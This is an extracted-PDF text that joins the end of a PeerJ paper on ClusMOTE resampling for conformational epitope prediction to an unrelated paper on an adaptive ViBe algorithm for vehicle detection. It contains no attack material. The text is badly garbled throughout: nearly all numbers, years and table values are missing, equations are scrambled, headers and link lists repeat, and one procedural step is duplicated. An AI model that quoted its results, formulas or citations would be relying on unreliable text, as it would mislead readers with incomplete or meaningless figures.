eq. ( ): fm= ∗ppv ∗se ppp+se = ∗tp/( ∗tp+fn +fp) ( ) where ppv=tp/(tp + fp) and se denote sensitivity or tpr. the f-measure is not affected by imbalance conditions provided the training data used are balanced (batuwita & palade, ). other metrics that can be used to assess performance include gmean and adjusted gmean (agm). the gmean is expressed in eq. ( ) below, gmean= √ sp∗se ( ) where sp denotes specificity/tpr and se denotes sensitivity/fpr. agm is expressed in eq. ( ): agm= { (gm+sp∗n)/( +nn) if se > if se = ( ) where gm is gmean, sp specificity, se sensitivity, and nn the proportion of negative samples in the dataset. agm is suitable for application in case an increase in tpr is achieved with minimal reduction in tnr. generally, this criterion is suitable for bioinformatics cases, where errors in the identification of negative classes are unexpected (batuwita & palade, ). in the case of epitope prediction, the false negative is not expected to be high. the selection of the wrong residue leads to the failure of the subsequent process. solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. results and discussions the complex-based leave-one-out cross-validation method is used to test the reliability of the classifier model. each training set is built from the n − complexes and tested with a test set from the n-th complex. model performance was measured using seven parameters, including tpr, tnr, precision, auc, gmean, agm, and f-measure. effect of the selection of the r value on model performance in the original dataset, the ratio of imbalance between negative and positive classes is : . to assess the effectiveness of sampling, this study utilized several r values derived using the ratio of negative to positive class data. the value r = indicates that only the clustering and undersampling steps are applied. the value r = indicates that the number of negative class datasets is twice the number of positive ones. the test results obtained without a balancing mechanism show the effectiveness of the proposed resampling method. the results of the assessment of the performance of the classification model expressed by the tpr, tnr, precision, auc, gmean, agm, and f-measure parameters are shown in table . the results of internal model validation on several variations of the r-value are also shown in table . where the r-value varies from r = to r = , both in clusmote dt and clusmote svm, the tpr and the fpr value tends to decrease with the increase in the r-value. the larger the degree of oversampling, the smaller the tpr. the tnr value, as well as precision, also tends to increase with the increase in the r-value. the increase in tnr values means more negative classes are recognized. this can also be interpreted as tnr value increases means less information loss of the negative class. these two conditions indicate a trade-off between the degrees of oversampling and undersampling. oversampling without undersampling yields tnr and precision values greater than undersampling without oversampling. similarly, undersampling without oversampling yields tpr and fpr values greater than oversampling without undersampling. this finding indicates the undersampling mechanism is more effective in increasing positive class recognition than the oversampling, which is consistent with previous studies. also, the resampling mechanism increases the tpr and fpr values compared to no resampling. however, the overall performance improvement indicated by the auc, gmean, agm, and f-measure is not significant. in clusmote dt, auc and gmean have the same tendency. the best auc and gmean are . and . at r = respectively. the agm and f-measure values also have the same tendency, though the values are different. in dt, the best agm and f-measure are obtained using the smote oversampling method. in the svm classifier, the best agm is obtained using the smote oversampling mechanism. however, the best f-measure is obtained using clusmote at r = . previous studies on class imbalance stated that the hybrid resampling method could significantly improve performance. however, this was not the case in epitope prediction using the clusmote dt method. no r value significantly influenced the overall performance improvement expressed by the auc, gmean, agm, and f-measure. in case the tpr and tnr values are considered together, the selection of r = is quite good as shown by the auc and gmean values. the selection of r values based on the experiment solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table performance of classification model with variations in the r-value. no resampling method r classifier tpr (recall) tnr precision (ppv) fpr auc gmean adjusted gmean fmeasure cluster-based only dt . a . . . a . . . . clusmote dt . . . . . a . a . . clusmote dt . . . . . . . . clusmote dt . . . . . . . . clusmote dt . . . . . . . . smote only – dt . . a . a . . . . a . a no resampling – dt . . . . . . . . cluster-based only svm . b . . . b . . . . clusmote svm . . . . . b . b . . clusmote svm . . . . . . . . clusmote svm . . . . . . . . clusmote svm . . . . . . . . b smote only – svm . . b . b . . . . . no resampling – svm . . . . . . . b . notes. tpr, true positive rate; tnr, true negaitive rate; auc, area under roc curve; gmean, geometric mean. athe best parameter value in dt model. bthe best parameter vaue in svm model. shows opposing conditions between the tpr and tnr. from table , the best performance using auc and gmean is fairer compared to agm and f-score. in the best auc and agm, a balanced proportion was obtained between the tpr and tnr. the best agm and f-score resulted from the lowest tpr value. generally, the performance models built with dt exhibit better performance than those from svm. the performance of svm is likely to be affected by kernel selection problems. linear kernels are cannot separate the classes in polynomial cases. other configurations or models may be explored for future work. comparison of the proposed method with previous methods clusmote dt was evaluated on an independent test set from kringelum et al. ( ) by filtering the dataset from the details used in the training process of the method being compared. a total of antigen data were used in the comparison, as listed in tab . the final results of the test show that clusmote with r = is superior to the other methods with an average auc value of . . the average auc values of discotope, ellipro, epitopia, epces, pepito, and discotope . were . , . , . , . , . , and . , respectively. clusmote dt with r = was evaluated on the independent test set of glycoprotein antigen by zhou et al. ( ). testing with glycoprotein antigen showed that the performance of clusmote dt was similar to that of seppa . , with the auc values of . and . , respectively. both clusmote dt and seppa . were superior to epitopia, discotope . , pepito, cbtope, seppa . , and bepipred . . the detailed performance of the eight methods compared is shown in tab . the auc achieved by clusmote dt is comparable to the one from seppa . , showing that the proposed solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. method might handle epitope cases with glycoprotein well. the model developed with clusmote uses the dataset presented by andersen, nielsen & lund ( ), which consists of antigen structures. the number of complex structures used in the clusmote model is less than that used in seppa . , which consists of antigen structures. the small number of antigen structures speeds up the training time for model development. conclusions an epitope is a small part of the exposed antigen that creates class imbalance problems in the prediction of learning-based conformational epitopes. in this study, the clusmote method was proposed to overcome the class imbalance problem in the prediction of the conformational epitope. the study shows that clusmote considerably increases the tpr compared to smote only. the comparison of the proposed model with state-of-the-art methods in the two datasets shows that clusmote dt is comparable to or better than other methods. its mean auc values in kringelum and the seppa . test sets are . and . , respectively. this result shows that clusmote dt is better than other methods in classifying the general protein antigen, though it is comparable to seppa . in the glycoprotein antigen. acknowledgements the authors thank the publishing and publication agency of universitas gadjah mada for the english proof-reading of this manuscript. additional information and declarations funding this work was supported by universitas trisakti (doctoral scholarship). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: universitas trisakti (doctoral scholarship). competing interests the authors declare there are no competing interests. author contributions • binti solihah conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • azhari azhari and aina musdholifah conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: the data and source code are available at github: - https://github.com/bsolihah/libfromjsat - https://github.com/bsolihah/conformational-epitope-predictor. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references andersen ph, nielsen m, lund ole. . prediction of residues in discontinu- ous b-cell epitopes using protein d structures. protein science : – doi . /ps. . . ansari hr, raghava gps. . identification of conformational b-cell epitopes in an antigen from its primary sequence. immunome research ( ): – doi . / - - - . basu s, bhattacharyya d, banerjee r. . mapping the distribution of packing topologies within protein interiors shows predominant preference for specific packing motifs. bmc bioinformatics ( ) – doi . / - - - . batuwita r, palade v. . a new performance measure for class imbalance learning. application to bioinformatics problems. in: international conference on machine learning and applications. miami beach, florida. florida: ieee computer society, – doi . /icmla. . . batuwita r, palade v. . class imbalance learning methods for support vector. in: he h, ma y, eds. imbalanced learning: foundations, algorithms, and applications. hoboken: john wiley & sons, inc, – . berman hm, westbrook j, feng z, gilliland g, bhat tn, weissig h, shindyalov in, bourne pe. . the protein data bank. nucleic acids research ( ): – doi . /nar/ . . . blaszczynski j, stefanowski j. . neighbourhood sampling in bagging for imbalanced data. neurocomputing : – doi . /j.neucom. . . . campello rjgb, moulavi d, sander j. . density-based clustering based on hierar- chical density estimates. in: pei j, tseng vs, cao l, motoda h, xu g, eds. advances in knowledge discovery and data mining pakdd part ii lnai. berlin: springer, – . chawla nv, bowyer kw, hall lo, kegelmeyer wp. . smote: synthetic minority over-sampling technique. journal of artificial intelligence research : – doi . /jair. . chawla nv, cieslak da, hall lo, joshi a. . automatically countering imbalance and its empirical relationship to cost. data mining and knowledge discovery ( ): – doi . /s - - - . solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/bsolihah/libfromjsat https://github.com/bsolihah/conformational-epitope-predictor http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /ps. . http://dx.doi.org/ . / - - - http://dx.doi.org/ . / - - - http://dx.doi.org/ . /icmla. . http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /jair. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. chawla nv, lazarevic a, hall lo, bowyer kw. . in: smoteboost: improving prediction of the minority class in boosting th european conference on principles and practice of knowledge discovery smoteboost: improving prediction of the minority class in boosting. in: lecture notes in computer science. doi . / - - - - . dalkas ga, rooman m. . sepia, a knowledge-driven algorithm for predicting conformational b-cell epitopes from the amino acid sequence. bmc bioinformatics ( ): – doi . /s - - - . das b, krishnan nc, cook dj. . handling class overlap and imbalance to detect prompt situations in smart homes. in: ieee th international conference on data mining workshops. ieee computer society. – doi . /icdmw. . . drummond c, holte rc. . c . , class imbalance, and cost sensitivity : why under- sampling beats over-sampling. in: icml workshop on learning from imbalanced data sets ii. washington, d.c. elkan c. . the foundations of cost-sensitive learning. in: proceedings of the seven- teenth international joint conference on artificial intelligence. – . estabrooks a, jo t, japcowick n. . a multiple resampling method for learning from imbalanced data sets. computational intelligence ( ): – doi . /j. - . .t - - .x. freund y, schapire re. . experiments with a new boosting algorithm. in: machine learning: proceedings of the thirteenth international conference. galar m, fern a, barrenechea e, bustince h. . hybrid-based approaches. ieee transactions on systems man and cybernetics part c (applications and reviews) ( ): – doi . /tsmcc. . . gary mw. . foundation of imbalanced learning. in: he h, ma y, eds. imbalanced learning: foundations, algorithms, and applications. hoboken: john wiley & sons, inc, – . hamelryck t. . an amino acid has two sides : a new d measure provides a different view of solvent exposure. . proteins structure, funct bioinforma : – doi . /prot. . han h, wang w, mao b. . borderline-smote: a new over-sampling method in imbalanced data sets learning. in: huang ds, zhang xp, huang gb, eds. advances in intelligent computing. icic . lecture notes in computer science, vol. , berlin, heidelberg: springer, – . he h, garcia ea. . learning from imbalanced data. ieee transactions on knowledge and data engineering ( ): – . hubbard sj, thornton jm. . naccess. computer program version . . . london: department of biochemistry and molecular biology, university college london. iba w, langley p. . in: induction of one-level decision trees, in ml : proceedings of the ninth international conference on machine learning. aberdeen, scotland: – – , san francisco, ca: morgan kaufmann, (july). solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /icdmw. . http://dx.doi.org/ . /j. - . .t - - .x http://dx.doi.org/ . /tsmcc. . http://dx.doi.org/ . /prot. http://dx.doi.org/ . /peerj-cs. japkowicz n, myers c, gluck m. . a novelty detection approach to classification. in: the fourteenth joint conference on artificial intelligence. new york: acm, – . jespersen mc, peters b, nielsen m, marcatili p. . epitope prediction using confor- mational epitopes. nucleic acids research : – doi . /nar/gkx . kabsch w, sander c. . dictionary of protein secondary structure:pattern recog- nition of hydrogen-bonded and geometrical features. biopolymers : – doi . /bip. . kawashima s, pokarowski p, pokarowska m, kolinski a, katayama t, kanehisa m. . aaindex: amino acid index database, progress report . nucleic acids research ( ): – doi . /nar/gkm . kringelum jv, lundegaard c, lund o, nielsen m. . reliable b cell epitope predictions: impacts of method development and improved benchmarking. plos computational biology ( ):e doi . /journal.pcbi. . kringelum jv, nielsen m, padkjaer s, lund o. . structural analysis of b-cell epitopes in antibody: protein complexes. molecular immunology ( – ): – doi . /j.molimm. . . . kulkarni-kale u, bhosle s, kolaskar as. . cep : a conformational epitope prediction server. nucleic acids research (web server issue): – doi . /nar/gki . lee b, richards fm. . the interpretation of protein structures: estimation of static accessibility. journal of molecular biology : – doi . / - ( ) -x. li p, pok g, ksj a, shon hs, ryu kh. . qse: a new -d solvent exposure measure for the analysis of protein structure. proteomics : – doi . /pmic. . liang s, zheng d, zhang c, zacharias m. . consensus scoring. bmc bioinformatics ( ): – doi . / - - - . lin w, tsai c, hu y, jhang j. . clustering-based undersampling in class-imbalanced data. information sciences – : – doi . /j.ins. . . . liu x, wu j, zhou z. . exploratory undersampling for. ieee transaction on cybernetics ( ): – doi . /tsmcb. . . mihel j, Šiki m, tomi s, jeren b, vlahovi k. . psaia–protein structure and interaction analyzer. bmc structural biology : – doi . / - - - . millerl s, janin j, leskv am, chothial c, laboratories ci, physicochimique db. . interior and surface of monomeric proteins t. journal of molecular biology : – doi . / - ( ) - . murzin ag, brenner se, hubbard t, chothia c. . scop : a structural classification of proteins database for the investigation of sequences and structures. journal of molecular biology : – . nielsen m, lundegaard c, worning p. . improved prediction of mhc class i and class ii epitopes using a novel gibbs sampling approach. bioinformatics ( ): – doi . /bioinformatics/bth . solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nar/gkx http://dx.doi.org/ . /bip. http://dx.doi.org/ . /nar/gkm http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /j.molimm. . . http://dx.doi.org/ . /nar/gki http://dx.doi.org/ . / - ( ) -x http://dx.doi.org/ . /pmic. http://dx.doi.org/ . / - - - http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /tsmcb. . http://dx.doi.org/ . / - - - http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /bioinformatics/bth http://dx.doi.org/ . /peerj-cs. nishikawa k, ooi t. . prediction of the surface-interior diagram of globular proteins by an empirical method.pdf. international journal of peptide and protein research : – . pintar a, carugo o, pongor s. . cx, an algorithm that identifies protruding atoms in proteins. bioinformatics ( ): – doi . /bioinformatics/ . . . ponomarenko j, bui h, li w, fusseder n, bourne pe, sette a, peters b. . ellipro : a new structure-based tool for the prediction of antibody epitopes. bmc bioinformat- ics ( ): – doi . / - - - . qi t, qiu t, zhang q, tang k, fan y, qiu j, wu d, zhang w, chen y, gao j, zhu r, cao z. . seppa . —more refined server to predict spatial epitope considering species of immune host and subcellular localization of protein antigen. nucleic acids research (may): – doi . /nar/gku . quinland jr. . c . programs for machine learning. san mateo: morgan kaufmann. raff e. . jsat: java statistical analysis tool, a library for machine learning. journal of machine learning research : – . raskutti b, kowalczyk a. . extreme re-balancing for svms: a case study. in: workshop on learning from imbalanced datasets ii. washington, d.c. ren j, liu q, ellis j, li j. . tertiary structure-based prediction of conformational b- cell epitopes through b factors. bioinformatics : – doi . /bioinformatics/btu . ren j, liu q, ellis j, li j. . positive-unlabeled learning for the prediction of confor- mational b-cell epitopes. bmc bioinformatics (suppl ): – . rost b, sender c. . conservation and prediction of solvent accesibility in pro- tein families. proteins structure, function genetics (november): – doi . /prot. . rubinstein nd, mayrose i, halperin d, yekutieli d, gershoni jm, pupko t. . computational characterization of b-cell epitopes. molecular immunology : – doi . /j.molimm. . . . rubinstein nd, mayrose i, pupko t. . a machine-learning approach for predicting b-cell epitopes. molecular immunology : – doi . /j.molimm. . . . shalev-shwartz s, singer y, srebro n. . pegasos: primal estimated sub-gradient solver for svm. in: international conference on machine learning (icml). new york. – . sowah ra, agebure ma, mills ga, koumadi km, fiawoo sy. . new cluster undersampling technique for class imbalance learning. international journal of machine learning and computing ( ): – doi . /ijmlc. . . . . sun j, wu d, xu t, wang x, xu x, tao l, li yx, cao zw. . seppa: a computa- tional server for spatial epitope prediction of protein antigens. nucleic acids research : – doi . /nar/gkp . sweredoski mj, baldi p. . pepito: improved discontinuous b-cell epitope pre- diction using multiple distance thresholds and half sphere exposure. bioinformatics ( ): – doi . /bioinformatics/btn . solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bioinformatics/ . . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /nar/gku http://dx.doi.org/ . /bioinformatics/btu http://dx.doi.org/ . /prot. http://dx.doi.org/ . /j.molimm. . . http://dx.doi.org/ . /j.molimm. . . http://dx.doi.org/ . /ijmlc. . . . http://dx.doi.org/ . /nar/gkp http://dx.doi.org/ . /bioinformatics/btn http://dx.doi.org/ . /peerj-cs. tien mz, meyer ag, sydykova dk, spielman sj, wilke co. . maximum allowed solvent accessibilites of residues in proteins. plos one ( ):e doi . /journal.pone. . tsai c, lin w, hu y, yao g. . under-sampling class imbalanced datasets by combining clustering analysis and instance selection. information sciences : – doi . /j.ins. . . . yen s, lee y. . expert systems with applications cluster-based under-sampling approaches for imbalanced data distributions. expert systems with applications : – doi . /j.eswa. . . . zhang j, zhao x, sun p, gao b, ma z. . conformational b-cell epitopes prediction from sequences using cost-sensitive ensemble classifiers and spatial clustering. biomed research international : – doi . / / . zhang w, xiong y, zhao m, zou h, ye x, liu j. . prediction of conformational b- cell epitopes from d structures by random forests with a distance-based feature. bmc bioinformatics ( ): – doi . / - - - . zhao l, hoi sch, li z, wong l, nguyen h, li j. . coupling graphs, efficient algorithms and b-cell epitope prediction. ieee/acm transactions on computational biology and bioinformatics ( ): – doi . /tcbb. . . zhao l, wong l, lu l, hoi sch, li j. . b-cell epitope prediction through a graph model. bmc bioinformatics ((sup )(s )): – . zheng w, ruan j, hu g, wang k, hanlon m, gao j. . analysis of conformational b-cell epitopes in the antibody-antigen complex using the depth function and the convex hull. plos one ( ): – doi . /journal.pone. . zhou c, chen z, zhang l, zhang l, yan d, mao t, tang k, qiu t, cao z. . seppa . —enhanced spatial epitope prediction enabling glycoprotein antigens. nucleic acids research (may): – doi . /nar/gkz . solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . / / http://dx.doi.org/ . / - - - http://dx.doi.org/ . /tcbb. . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /nar/gkz http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research on improved adaptive vibe algorithm for vehicle detection kun jiang school of computer science and engineering xi'an technological university xi'an, china e-mail: @qq.com jianguo wang school of computer science and engineering xi'an technological university xi'an, china e-mail: wjg_xit@ .com abstract—vehicle detection is an important step in vehicle tracking and recognition in video environment. vibe algorithm is a moving target detection algorithm based on background difference method. based on the traditional vibe algorithm, this paper introduces three-frame difference method combined with vibe algorithm to speed up the elimination of ghosts, and proposes an adaptive vibe algorithm, which defines two kinds of vehicle detection errors and their corresponding error functions. then, according to the range of these two errors, a set of reasonable judgment methods are determined to adjust the unreasonable threshold, which ensures the adaptive updating of the background model. it improves the environmental adaptability of vehicle detection and ensures higher accuracy of vehicle detection under complex illumination conditions. keywords-vehicle detection; background difference method; vibe algorithm; three-frame difference algorithm i. introduction vehicle detection is the key step of video vehicle recognition, which aims to obtain the location of vehicle for further recognition. for each pixel, its background can usually be built using a model. at present, there are three methods for moving object detection: optical flow method[ ], frame difference method[ ], background subtraction method[ ]. based on the motion vector of pixels, the optical flow method can detect and track the target, but it has a large amount of computation and poor real-time performance. moreover, the method lacks sensitivity to noise, illumination change and background interference. frame difference method detects moving objects according to the difference between two or three consecutive frames. it has strong adaptability to the background change, but it does not perform well in detecting the contour of moving objects. in addition, it is very sensitive to the speed of moving objects, so it cannot effectively detect slow moving objects; background difference method is a commonly used moving object detection algorithm. the main idea is to make a distinction between each frame and background model to build the background model and get the moving foreground objects. background difference method has the ability to adapt to the scene changes in the video background, but if the background model contains foreground objects, it may generate ghosting. background difference method is one of the most widely used vehicle detection methods because of its fast and accurate. traditional background subtraction algorithms include gaussian mixture model (gmm)[ ] and codebook[ ]. gmm method is simple and low cost. however, the initialization time is too long and the algorithm is complex to meet the real-time requirements. cookbook has the advantages of dealing with time fluctuations well, but its memory consumption is quite high. in , olivier barnechand international journal of advanced network, monitoring and controls volume , no. , marc van droogenbroeck proposed the vibe algorithm [ ]. because the algorithm only needs the first frame to complete the model initialization, it can meet the real-time requirements compared with gmm model. in addition, in the process of execution, the algorithm only needs to record the corresponding sample set for each pixel, so it has smaller memory consumption. in addition, vibe algorithm has goodanti noise ability. although the foreground object can be mixed in pixel initialization, it will produce ghost phenomenon. in this paper, an improved adaptive algorithm of vibe is proposed, and a moving target detection method based on three frame difference method is introduced. through experimental verification, the algorithm proposed in this paper effectively solves the problems of "ghost" existing in traditional vib algorithm and insufficient adaptability to complex light environment. it has the advantages of simple algorithm, good real-time performance and high detection accuracy. ii. vibe background modeling the vibe background modeling algorithm was proposed by olivier barnech et al in .[ ] can be used for fast background extraction and moving object detection. vibe algorithm uses two mechanisms of random selection and neighborhood propagation to build and update the background model, which includes three steps: background modeling and initialization, foreground detection and background model update. in this paper, based on the traditional vibe algorithm, an adaptive background model of vibe is added. according to the range of vehicle detection error, a set of judgment method is determined to evaluate the rationality of the current threshold. when the threshold is not reasonable, adjust according to a certain step to ensure that the background model is updated automatically, and finally get more accurate vehicle detection results. initialization of background model x v represents the pixel value at point x, and each pixel builds the number of background sample sets n ( n ):  },,,{)( nvvvxm    as shown in fig. , the gray space makes the region centered on x, the radius of the gray space ))(( xvs r is r , and the threshold min# is set( min#  ). then find the intersection of )(xm and ))(( xvsr , c is the total number of elements in the intersection:   }},,{))(({)(# nr vvvxvsxmc    figure . vibe background model. the initialization of vibe model only needs the first image, but only one image does not contain the spatial information of pixels. according to the similar spatial characteristics of the close pixels, the sample set is filled with the approximate pixels. when the first image is input, the background model of the pixels in the image is as follows ( ):  )}(|{)( xnyyvxm g   international journal of advanced network, monitoring and controls volume , no. , where, )(xng represents the neighborhood pixel; v is the currently selected pixel. the probability that the pixels in )(xng are selected in n initialization is nn /) (  . a. foreground detection after initialization, vehicle detection starts from the second image. separating foreground target and background is the process of moving target detection. at time t , the pixel value of random pixel x is tv , according to formula ( ) c is judged according to formula ( ):        )background(min# )foreground(min# c c v t   t ( t ) is a preset threshold. when the number of times for the background is greater than the threshold min# , the pixel x are considered to belong to the background area; if not, it belongs to the foreground target area. according to formula ( ), the binary image obtained after vehicle detection is the initial vehicle detection binary image. b. dynamic update of background model in the process of updating the vibe background model, not only the relationship between the current pixel and its historical samples, but also the relationship between the current pixel and other pixels in other spatial neighborhood should be considered. in other words, the updating of vibe background model is a random process in both time and space. in the background model in the previous frame, if the current pixel tv is marked as background, its background model )(xm t is updated in time. if the current pixel is marked as vehicle, the model is not updated. this update strategy is called conservative update strategy. the method of updating the background model is to randomly select the sample m in the sample set )(xm t . the method to update the background model in space is to calculate the gradient amplitude of the current pixel tv , if the gradient amplitude is greater than , the space update is not implemented. otherwise, in the neighborhood of the current pixel t v , randomly select the pixel marked as tv , in the background model )(xm t of pixel tv randomly select a sample jm , and the characteristic value of the current pixel tv is assigned to jm . if the current pixel tv is at the edge of the image, it is randomly selected in its incomplete neighborhood. the spatial update strategy ensures the continuity of spatial information in the background image. iii. adaptive vibe background model in the vibe background model, threshold r represents the range of background eigenvalues (as shown in figure ). threshold r has a great influence on vehicle detection results. if the fixed threshold value is greater than the expected threshold value, it should be the vehicle's area, which will lead to inaccurate detection of the vehicle area. a. error functions of vehicle there are several situations of vehicle detection error: the detection background area is mistakenly international journal of advanced network, monitoring and controls volume , no. , regarded as the vehicle area, or the vehicle area is mistakenly regarded as the background area. the former belongs to the error vehicle area; the latter is the error background area. the size of these two types of error areas will change with the change of threshold r . when the threshold r is very small, the fluctuation range of the sample eigenvalues in the vibe background model is also very small, which helps to improve the detection accuracy of the vehicle area. the noise area may be mistakenly regarded as the wrong vehicle area, and the small noise area can be removed by morphological method, but the large noise area will not be easily removed. therefore, in order to prevent this situation, it is necessary to minimize the wrong vehicle area. in theory, the wrong vehicle area is part of the background and it is static. therefore, if the connected region does not overlap all the moving regions in the binary mapping of frame difference, the connected region is considered as the wrong vehicle region, and the error function of the wrong vehicle region can be defined as:  wl a rerr n i i     )(   where, i a is the ith connected domain, which does not overlap all moving regions in the binary mapping of frame difference, and n is the number of such connected domains. is the total area of the wrong vehicle area, l and w represent the length and width of the image respectively, and their units are pixels. the higher the resolution of the image, the more accurate the value of   n i i a . the wrong vehicle area function is defined as the ratio of the total area of the wrong vehicle area to the total area of the image. when the threshold value r is large, the fluctuation range of the sample eigenvalues in the vibe background model is also large, which is conducive to improving the detection accuracy of the background region. the second type of error area is to detect the area originally belonging to the vehicle as the background area [ ]. firstly, error background area error i a is defined, which represents the difference between the area of the smallest external rectangle containing the ith vehicle and the area of the same vehicle detected. is is the area of the smallest external rectangle containing the first vehicle, and iv is the area of the ith vehicle detected.  iii vsa    therefore, error background area error function can be further defined as:  )( n a rerr n i i     where n is the number of vehicles.   n i i a is the total area of the wrong vehicle area, take the average value to the error )( rerr of the wrong background area. from the above, the error )( rerr of the error background area and the error )( rerr of the error vehicle area are obtained. the total error of the error area can be defined as:  )()()( rerrrerrrerr    international journal of advanced network, monitoring and controls volume , no. , b. adaptive adjustment of threshold if the current threshold r is too small, the area of the area originally belonging to the background and mistakenly detected as the vehicle is too large, which means that the area )( rerr of the wrong vehicle area is relatively large. if the current threshold is too large, the area )( rerr of the area originally belonging to the vehicle and mistakenly detected as the background is too small, which means that the area of the wrong background is relatively large. according to this situation, we use the following adaptive scheme[ ]:          elserr trerrandtrerrifelsenrr trerrifnrr , )()(, )(,   t and t is the parameter to judge the rationality of threshold, and n is the adjustment step of threshold r . after a lot of experiments, the range of t is . to . ,the range of t is . to . , the range of n is to . a large number of experiments show that these values can ensure that the total error of the error background area and the error vehicle area proposed in this paper can be minimized. iv. improved adaptive vibe algorithm of three frame difference method this paper presents an improved adaptive vibe background modeling algorithm, which uses the vibe algorithm to model the background, adjusts the threshold adaptively, and then introduces the three frame difference method to improve. vibe background model algorithm is based on the first image to establish the background model[ ], but the traditional vibe algorithm will appear the phenomenon of "ghost". at present, many domestic and foreign literatures have carried out relevant research on the problem of "ghost". at present, the more commonly used method is to combine the traditional vibe algorithm with other algorithms, or to change the initialization of the first image of the original algorithm to a multi frame image initialization. the traditional vibe algorithm needs hundreds of frames to completely eliminate the "ghost" in the first frame. using the improved adaptive vibe background modeling algorithm, the speed of eliminating the "ghost" is accelerated, and the "ghost" can be eliminated within dozens of frames. at the same time, the proposed adaptive vibe algorithm greatly improves the traditional vibe background modeling algorithm for complex light environment detection. after the introduction of three frame difference method, the speed of eliminating "ghost" is obviously speeded up, and the problem of "hole" existing in the three frame difference method itself is solved. finally, the accuracy of moving object detection is improved by morphological processing of detection results. the flow chart of the improved vibe algorithm based on the three frame difference method is shown in figure , and the specific implementation steps are as follows: ) input video image, and carry out image pre-processing such as graying and binarization. ) background modeling of three frame difference method and background modeling of vibe algorithm are carried out respectively for the image preprocessed. the final image is the "and" of the image calculated by the two methods. ) background modeling of three frame difference method and background modeling of vibe algorithm are carried out respectively for the image preprocessed. the final image is the "and" of the image calculated by the two methods. ) through the adaptive threshold adjustment algorithm proposed in this paper, the appropriate threshold is calculated to update the current background. international journal of advanced network, monitoring and controls volume , no. , ) the updated image is processed by morphology to get the final detection results. figure . improved vibe algorithm of three frame difference method. v. experimental result based on the above theory and processing flow, the algorithm is tested in the following environment: operating system: microsoft windows , experimental platform: visual studio , cpu: intel , ram: g, third-party open source library: opencv . . . in order to verify that the method proposed in this paper can accurately detect moving objects in complex environment, the video selected in this experiment is the road monitoring video with more vehicles. this video is the traffic situation of a certain intersection at a certain time, with frames in total, and the frame size is * . an improved three frame difference algorithm based on vibe background modeling is used to detect moving vehicles. during the experiment, the th frame, frame and frame of video image sequence are randomly selected to analyze the detection effect. th frames th frames th frames (a) original video (b) original vibe algorithm (c) gaussian mixture model (d) three frame difference method (e) improved vibe algorithm figure . comparison between the algorithm in this paperand the traditional target detection algorithm. it can be seen from figure that the original vibe algorithm of frame has obvious ghost phenomenon and interference of complex lighting environment factors, and the effect of gaussian mixture model is good, but the calculation of gaussian mixture model is too complex to meet the real-time requirements of vehicle detection, the real-time performance of three frame difference method is good but the accuracy is not high enough, and there is an obvious "empty" phenomenon. in contrast, this algorithm effectively solves the ghost phenomenon and reduces the impact of complex environmental factors. international journal of advanced network, monitoring and controls volume , no. , table i. evaluation results of vehicle inspection gmm three frame difference original vibe improve d vibe recall . % . % . % . % precision . % . % . % . % f . % . % . % . % vi. conclusion in order to solve the ghost phenomenon in vibe algorithm and the problem of low detection accuracy in complex illumination environment, this paper first proposes an adaptive threshold vibe algorithm in order to update the background accurately under the condition of complex illumination change. by defining two kinds of vehicle detection error functions, according to the error range calculated by these two functions, an algorithm is used to determine the rationality of threshold. vehicle detection and background update are performed by using the adaptive algorithm. in order to solve the problem of ghost, three frame difference method and adaptive vibe algorithm are introduced. finally, the experimental results show that the improved adaptive vibe algorithm can effectively remove the "ghost" phenomenon and improve the accuracy of vehicle detection in complex lighting environment. figure shows the change of the number of ghost pixels with the number of frames. the x axis represents the number of frames, and the y axis represents the number of ghost pixels. it can be seen from the figure that the improved algorithm in this paper greatly accelerates the ghost elimination speed, which is significantly faster than the gaussian mixture algorithm and the vibe algorithm. figure . ghost elimination speed. references [ ] delpiano j, jara j, scheer j, et al. performance of optical flow techniques for motion analysis of fluorescent point signals in confocal microscopy. machine vision & applications, , ( ): - . [ ] j.-g. yan, w.-h xu. moving object real-time detection algorithm based on new frame difference. computer engineering & design, , ( ): - . [ ] yang w, zhang t. a new method for the detection of moving targets in complex scenes. journal of computer research & development, . [ ] kaewtrakulpong p, bowden r. an improved adaptive background mixture model for realtime tracking with shadow detection. springer us, . [ ] kim k, chalidabhongse t h, harwood d, et al. real-time foreground– background segmentation using codebook model. real-time imaging, , ( ): - . [ ] barnich o, van d m. vibe: a universal background subtraction algorithm for video sequences. ieee transactions on image processing a publication of the ieee signal processing society, , ( ): - . [ ] barnich o, van droogenbroeck m. vibe: a unrsal background subtraction algorithm for video 